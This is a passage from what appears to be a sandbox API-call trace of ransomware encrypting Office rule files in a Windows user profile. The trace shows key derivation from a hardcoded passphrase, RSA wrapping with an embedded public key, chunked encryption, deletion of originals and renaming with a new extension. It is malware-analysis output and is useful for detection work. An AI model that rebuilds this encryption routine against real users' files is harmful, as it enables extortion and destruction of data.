lpOverlapped=0x0) returned 1 [0269.105] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.105] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.105] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.105] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.105] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.105] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.105] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.105] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.105] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.105] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.106] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.106] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.106] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.106] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.106] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.106] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.106] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.106] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.106] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.106] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.106] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.106] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.106] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.106] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.106] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.106] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.107] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.107] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.107] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.107] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.107] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.107] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.107] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.107] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.107] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.107] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.107] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.107] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.107] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.107] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.107] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.108] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.108] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.108] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.108] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.108] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.108] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.108] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.108] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.108] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.108] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.109] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.110] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.110] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.110] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.110] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.110] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.110] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.110] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.110] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.110] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.110] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.110] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x31c, lpOverlapped=0x0) returned 1 [0269.110] CryptEncrypt (in: hKey=0x2fa548, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x31c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x320) returned 1 [0269.111] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x320, lpOverlapped=0x0) returned 1 [0269.111] CloseHandle (hObject=0x5d3c) returned 1 [0269.111] CloseHandle (hObject=0x5d48) returned 1 [0269.111] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\onenote.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\onenote.exe_rules.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\onenote.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\onenote.exe_rules.xml"), bFailIfExists=0) returned 1 [0269.118] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\onenote.exe_Rules.xml", dwFileAttributes=0x0) returned 1 [0269.119] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\onenote.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\onenote.exe_rules.xml.gsg")) returned 1 [0269.121] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\onenote.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\onenote.exe_rules.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\onenote.exe_Rules.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\onenote.exe_rules.xml.fuck")) returned 1 [0269.123] CryptDestroyHash (hHash=0x2fa788) returned 1 [0269.123] CryptDestroyKey (hKey=0x2fa548) returned 1 [0269.123] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0269.123] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0269.123] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0269.123] GetLastError () returned 0x0 [0269.123] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\osfinstaller.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\osfinstaller.exe_rules.xml")) returned 0x20 [0269.124] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\osfinstaller.exe_Rules.xml", dwFileAttributes=0x80) returned 1 [0269.125] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\osfinstaller.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\osfinstaller.exe_rules.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0269.126] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\osfinstaller.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\osfinstaller.exe_rules.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0269.127] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\osfinstaller.exe_Rules.xml.gsg", dwFileAttributes=0x2) returned 1 [0269.127] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0269.130] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0269.130] lstrlenA (lpString="yzLScEfviKODKVbxMUZoAxYXzMlQm") returned 29 [0269.130] CryptHashData (hHash=0x2fa7c8, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0269.130] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa7c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa848) returned 1 [0269.130] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0269.130] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0269.130] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f26010) returned 1 [0269.131] CryptImportPublicKeyInfo (in: hCryptProv=0x2f26010, dwCertEncodingType=0x1, pInfo=0x2f30a30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f30a60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f30a68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa588) returned 1 [0269.131] CryptEncrypt (in: hKey=0x2fa588, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0269.131] CryptEncrypt (in: hKey=0x2fa588, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f258a0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f258a0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0269.131] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f258a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f258a0*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0269.132] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.152] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.152] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.154] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.154] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.154] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.154] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.154] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.154] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.155] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.155] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.155] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.155] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, 